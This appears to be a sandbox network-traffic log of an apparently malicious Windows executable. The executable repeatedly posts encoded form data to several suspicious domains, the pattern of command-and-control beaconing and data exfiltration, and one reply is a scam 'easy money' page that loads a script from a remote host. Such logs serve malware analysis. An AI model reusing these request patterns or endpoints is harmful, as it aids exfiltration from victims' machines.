Timestamp: Dec 14, 2024 13:50:34.765428066 CET | Bytes transferred: 775 | Direction: OUT | Data: POST /86am/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.kkpmoneysocial.top
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 225
Connection: close
Origin: http://www.kkpmoneysocial.top
Referer: http://www.kkpmoneysocial.top/86am/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Data Ascii: NVK8=6q6n6VLzU8esLixmgTDEGQzvGqIFJvZJOa5yvZJDWzmPSlFHe4zV3hOvLx0dt15xhQECbj3Ng+AVnWE0FoLttPaJgQUxc6msy+yHFyQ45pkUzoHf4sUWub+MFXdH2WN4EmNlHSa7AFF41dcPUBQkM8F9zBMM89CoVnDcfSAkW3pWcOAeoM+nWSuPLXOss2ItPoKUcf11ahgAJav/1ZwZDhgXM3RE
Timestamp: Dec 14, 2024 13:50:36.030252934 CET | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 200 OK
Date: Sat, 14 Dec 2024 12:50:35 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Set-Cookie: loclang=en; expires=Tue, 17-Dec-2024 12:50:35 GMT; Max-Age=259200; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dNwcr9NzIV4x3V8G74y0B5dsBUpO7ayTivpEP0ZLpey8soUIX8lnPcKiMACMUVyTfPpUQncChcEagdC9dZdgudfyuQM1UOTZvt6ieMzr%2F7EIXUpoxdYxbOcwS%2BehNp%2BDVjfDRfA9FTu1"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f1e520d0da83342-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1792&rtt_var=896&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=775&delivery_rate=0&cwnd=148&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Timestamp: Dec 14, 2024 13:50:36.030323029 CET | Bytes transferred: 785 | Direction: IN | Data: (gzip-compressed binary chunk)


Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49895 | Destination IP: 172.67.129.38 | Destination Port: 80 | PID: 6008 | Process: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
Timestamp: Dec 14, 2024 13:50:37.439019918 CET | Bytes transferred: 1792 | Direction: OUT | Data: POST /86am/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.kkpmoneysocial.top
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1241
Connection: close
Origin: http://www.kkpmoneysocial.top
Referer: http://www.kkpmoneysocial.top/86am/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Timestamp: Dec 14, 2024 13:50:38.711863041 CET | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 200 OK
Date: Sat, 14 Dec 2024 12:50:38 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Set-Cookie: loclang=en; expires=Tue, 17-Dec-2024 12:50:38 GMT; Max-Age=259200; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LStDzmAlerKWT8ceAJSwBqLWh2FyYnuCWkqJRG4Uf6sszSAaFjVAGvItrT6KJsmR8hPRVjh4NpbCy4QmUrnQ%2FF5d5FHpTrgKfSpLUfc5w8C6TPIOKlGk5iVBXY5a8JPMCnS4HnIzZdQd"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f1e521dbd154249-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1719&min_rtt=1719&rtt_var=859&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1792&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Timestamp: Dec 14, 2024 13:50:38.711951971 CET | Bytes transferred: 782 | Direction: IN | Data: (gzip-compressed binary chunk)


Session ID: 8 | Source IP: 192.168.2.5 | Source Port: 49901 | Destination IP: 172.67.129.38 | Destination Port: 80 | PID: 6008 | Process: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
Timestamp: Dec 14, 2024 13:50:40.101349115 CET | Bytes transferred: 487 | Direction: OUT | Data: GET /86am/?V6T=lB24KzN0lF-8&NVK8=3oSH5g+vR97eOiEYl3yzUVrLMoE7cdRqP5dq8IAVURGuW00cQLCZ5FvWMVk05HdygRwRYgTMj/cz+G8Xe6buvt3CihlxRoa3yNm7JisfhZdaiIXVwsk9uJu6AhIF/VUrZw== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.kkpmoneysocial.top
Connection: close
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Timestamp: Dec 14, 2024 13:50:41.363744020 CET | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 200 OK
Date: Sat, 14 Dec 2024 12:50:41 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Set-Cookie: loclang=en; expires=Tue, 17-Dec-2024 12:50:41 GMT; Max-Age=259200; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eKCnHs4tN9Gpwbl85gOjIrwZGFqfMqSN0wXxI4Ad1Lcf2D6sa3J0qjs8TV8y7Xhm0EA5kVzwgMpxfIYeYRk4dUeXTr1AjKIDvE0HaTU8SMPH3DFNxC2jRxmOQWe2jpRrJV4slXVlQuyR"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f1e522e6ea37d0e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1792&rtt_var=896&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=487&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Ascii: dc4<!DOCTYPE html><html><head><script> setTimeout(function(){ location.href="/index.php"; },5000);</script><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta property="og:image" content="/assets/social_img2.jpg"><meta property="og:title" content="Let's make money
Timestamp: Dec 14, 2024 13:50:41.363765001 CET | Bytes transferred: 1236 | Direction: IN
Data Ascii: easily with mobile phone "> <meta property="og:description" content="We are the best earning site online paying over $35 million per month to 300,000 members"><meta property="og:image:width" content="600px"><meta property="og:image:he
Timestamp: Dec 14, 2024 13:50:41.363814116 CET | Bytes transferred: 1236 | Direction: IN
Data Ascii: (^| )"+name+"=([^;]*)(;|$)"); if(arr=document.cookie.match(reg)) { return unescape(arr[2]); } else { return ""; } } function rset_Cookie(name,value) { var hour =
Timestamp: Dec 14, 2024 13:50:41.363827944 CET | Bytes transferred: 720 | Direction: IN
Data Ascii: MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==';};});$.getScript('//moneyeasilysni.top/typed.js?1734180641',function(){ if(!rget_Cookie('hasgo')){rset_Cookie('godomain','moneyeasilysni.top');rset_Cookie('area','');rset_Cookie_fast('hasgo','moneyea


Session ID: 9 | Source IP: 192.168.2.5 | Source Port: 49917 | Destination IP: 185.42.14.166 | Destination Port: 80 | PID: 6008 | Process: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
Timestamp: Dec 14, 2024 13:50:47.310389996 CET | Bytes transferred: 731 | Direction: OUT | Data: POST /q5xl/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.artkub.net
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 205
Connection: close
Origin: http://www.artkub.net
Referer: http://www.artkub.net/q5xl/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Data Ascii: NVK8=AVvPmcJk9dspBy0kqnLp2+PM4Q5DDbzmhLGZSUo78szcXgD5D4/RB3hhyvYa3SF8V/tafyBGLfZqC+aNcu6eC91evheF5MykP0CsphFWLHVEp1wFPdGyBV4qj23Vmjh1PFvY6yF2WPxTGt8L8WZr82f2uY49FAba5IexGc/DemRC+UwhvK2ipmmUyejaFf87IvkHS2k=
Timestamp: Dec 14, 2024 13:50:48.615886927 CET | Bytes transferred: 711 | Direction: IN | Data: HTTP/1.1 405 Not Allowed
Server: nginx/1.27.3
Date: Sat, 14 Dec 2024 12:50:48 GMT
Content-Type: text/html
Content-Length: 559
Connection: close
                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.27.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49929 | 185.42.14.166 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:50:49.967820883 CET | 751 | OUT | POST /q5xl/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.artkub.net
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 225
Connection: close
Origin: http://www.artkub.net
Referer: http://www.artkub.net/q5xl/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Data Ascii: NVK8=AVvPmcJk9dspASEk5Q/p0ePPmg5DI7zihLaZSVdg7ZjcZib5A6XRG3hh9PYVoCFnV/gwfwlGLf9qC8CNcf6ZDt1c0xeH0sykP0CsphQBLH9EoFgFO8HACV5Yk23VxzhxPFvf6zZQWMJTGsMLynZoy2e9xo5WKAGl7ISqFuGLHAE3yCBL1o+K6GKsiNrtUvdSSM03Mhxv5JDCWkT+lMV98PDsU9/L
Dec 14, 2024 13:50:51.276110888 CET | 711 | IN | HTTP/1.1 405 Not Allowed
Server: nginx/1.27.3
Date: Sat, 14 Dec 2024 12:50:51 GMT
Content-Type: text/html
Content-Length: 559
Connection: close
Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.27.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49935 | 185.42.14.166 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:50:52.644552946 CET | 1768 | OUT | POST /q5xl/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.artkub.net
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1241
Connection: close
Origin: http://www.artkub.net
Referer: http://www.artkub.net/q5xl/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Data Ascii: NVK8= [TRUNCATED]
Dec 14, 2024 13:50:53.957189083 CET | 711 | IN | HTTP/1.1 405 Not Allowed
Server: nginx/1.27.3
Date: Sat, 14 Dec 2024 12:50:53 GMT
Content-Type: text/html
Content-Length: 559
Connection: close
Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.27.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49942 | 185.42.14.166 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:50:55.304784060 CET | 479 | OUT | GET /q5xl/?NVK8=NXHvlplEz+AaHjlx30Dg0ITo3hgweafquKqjP3Y/xf7/cg6iHYjvJgtir9Vs9Xh3XfF5Sx90CNRcQ8yUM+iNQ/JKoQzS5dKBNmaKnzIoSlYQ6FYKM8mOI3dFoEeNlxQJdw==&V6T=lB24KzN0lF-8 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.artkub.net
Connection: close
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Dec 14, 2024 13:50:56.996095896 CET | 236 | IN | HTTP/1.1 200 OK
Server: nginx/1.27.3
Date: Sat, 14 Dec 2024 12:50:56 GMT
Content-Type: text/html
Content-Length: 31542
Last-Modified: Wed, 11 Dec 2024 10:35:31 GMT
Connection: close
ETag: "67596af3-7b36"
Accept-Ranges: bytes
Dec 14, 2024 13:50:56.996113062 CET | 1236 | IN | Data Ascii: <!DOCTYPE html><html lang="ru"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"/> <meta http-equiv="Cache-Control" content="n
Dec 14, 2024 13:50:56.996841908 CET | 1236 | IN | Data Ascii: data-path="burger"> <img src="./img/.svg" alt=""> </div> </header> <main> <div class="mainBlock"> <div class="maintext"> <div class="mainTitle">
Dec 14, 2024 13:50:56.996860981 CET | 1236 | IN | Data Ascii: ss="mainPluses-icon"> <img src="./img/mainPluses.svg" alt=""> </div> <div class="mainPluses-txt">
Dec 14, 2024 13:50:56.996872902 CET | 1236 | IN | Data Ascii: -, , ,
Dec 14, 2024 13:50:56.996879101 CET | 1236 | IN | Data Ascii: <img src="./img/Ellipse 19.svg" alt=""> </div> <div class="circle-txt">5</div> </div> <p> <
Dec 14, 2024 13:50:56.996890068 CET | 1236 | IN | Data Ascii: </div> </div> <div class="blockDirection"> <div class="title"></div> <div class="directions"> <div class="directions-item"> <
Dec 14, 2024 13:50:56.996901989 CET | 1236 | IN | Data Ascii: </p> </div> <div class="directions-item-block-buttonMore buttonOpenModal" data-path="stolovka"><p></p></div> </div
Dec 14, 2024 13:50:56.996958017 CET | 1236 | IN | Data Ascii: ock"> <div class="directions-item-block-txt"> <p> <br>
Dec 14, 2024 13:50:56.996972084 CET | 1236 | IN | Data Ascii: ions-item-block-buttonMore buttonOpenModal" data-path="ferma"><p></p></div> </div> </div> </div> </div> <div class="blockPlases"> <div class="t
Dec 14, 2024 13:50:56.998611927 CET | 1236 | IN | Data Ascii: us-item-icon"> <img src="./img/.svg" alt=""> </div> <div class="plus-item-textBox icontextbox2"> <div class="textBox-ti


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49959 | 209.74.77.107 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:51:03.091006041 CET | 740 | OUT | POST /4t49/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.happyjam.life
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 205
Connection: close
Origin: http://www.happyjam.life
Referer: http://www.happyjam.life/4t49/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Data Ascii: NVK8=nQ80xGd328mxhYWdY9GHKknM5mZtt94ay+ZIKhdDq7VkIINqIAYa8dHYv/uF7VJh02hZWzx5u3ZS5q3ZX/Hf5FBUuGIATGWztYOcLBbNTKt1xW5cJqqgEKILbo2OyI7FBnrB6EEPGQiK0leZfDHhDMYjWLAGeAc/0B/tMOzK6do1eaeeaHIo/gO2VHRr8yDbwXvrxhk=
Dec 14, 2024 13:51:04.314090967 CET | 533 | IN | HTTP/1.1 404 Not Found
Date: Sat, 14 Dec 2024 12:51:04 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49965 | 209.74.77.107 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:51:06.195230961 CET | 760 | OUT | POST /4t49/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.happyjam.life
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 225
Connection: close
Origin: http://www.happyjam.life
Referer: http://www.happyjam.life/4t49/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Data Ascii: NVK8=nQ80xGd328mxj4GdeeeHb0nN8mZtid4ey+lIKk5TrN9kGMJqLEMa/dHYnfuc/VIj03ckWyN5u3NS5qHZXozc/FBWimICemWztYOcLBfnTK11wmJcLOGjNqIEMY2O2I7BBnqi6Bc1GSaK0gyZR2niKMYhLbBkVyJy0DygFO/DhP8KSMv0AlAAsAiOFUZctCiyq0/bv2wJFY2BJY6MUo0hx8FdbKes
Dec 14, 2024 13:51:07.403924942 CET | 533 | IN | HTTP/1.1 404 Not Found
Date: Sat, 14 Dec 2024 12:51:07 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                15192.168.2.549974209.74.77.107806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:51:08.861866951 CET1777OUTPOST /4t49/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.happyjam.life
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Origin: http://www.happyjam.life
                                                                                Referer: http://www.happyjam.life/4t49/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 6e 51 38 30 78 47 64 33 32 38 6d 78 6a 34 47 64 65 65 65 48 62 30 6e 4e 38 6d 5a 74 69 64 34 65 79 2b 6c 49 4b 6b 35 54 72 4e 31 6b 47 35 64 71 52 6a 77 61 2b 64 48 59 70 2f 75 42 2f 56 49 69 30 33 45 6f 57 79 41 43 75 31 31 53 2f 4a 2f 5a 41 71 62 63 73 6c 42 57 71 47 49 42 54 47 58 7a 74 59 2b 41 4c 42 76 6e 54 4b 31 31 77 6c 52 63 50 61 71 6a 4c 71 49 4c 62 6f 32 53 79 49 37 70 42 6a 2b 63 36 42 51 6c 48 6d 6d 4b 30 41 69 5a 64 6c 50 69 46 4d 59 6e 49 62 42 43 56 79 55 79 30 44 76 54 46 4f 4b 65 68 4e 73 4b 57 34 69 4f 51 58 41 45 33 53 75 6a 50 30 42 75 36 45 4b 53 6a 43 6a 4e 72 47 55 32 4b 71 6d 4a 66 63 2b 79 5a 34 6c 52 72 61 4e 70 63 64 6e 38 46 44 39 61 43 77 78 74 61 61 66 7a 7a 49 64 64 72 66 37 58 66 6f 46 30 36 36 44 63 59 32 79 53 46 6d 4f 75 42 6f 49 33 48 56 44 55 2b 55 7a 70 74 68 70 74 36 63 6e 36 51 46 6f 4c 48 4f 31 56 78 64 74 34 65 63 63 36 32 61 71 53 61 52 36 48 58 72 72 4c 6a 49 76 79 79 53 59 37 64 34 53 53 39 6c 45 6e 52 48 30 4a 70 61 31 75 2f 78 6c 63 34 [TRUNCATED]
                                                                                Data Ascii: NVK8=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 [TRUNCATED]
                                                                                 Dec 14, 2024 13:51:10.137029886 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Sat, 14 Dec 2024 12:51:09 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 16 | 192.168.2.5 | 49981 | 209.74.77.107 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 14, 2024 13:51:11.525719881 CET | 482 | OUT | GET /4t49/?NVK8=qSUUy2RUpcHfgeDYScePJkyQ5UV89Z0x3ukWI3F+j71sN74kYD8q/afbxdu8+w0uynd4aRJgg192nr/hQaDB6X5vsGIHc1mVtIO2AR3GSaQwpWdADtOmAN4eNIbS06uucA==&V6T=lB24KzN0lF-8 HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.happyjam.life
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                 Dec 14, 2024 13:51:12.742244959 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Sat, 14 Dec 2024 12:51:12 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
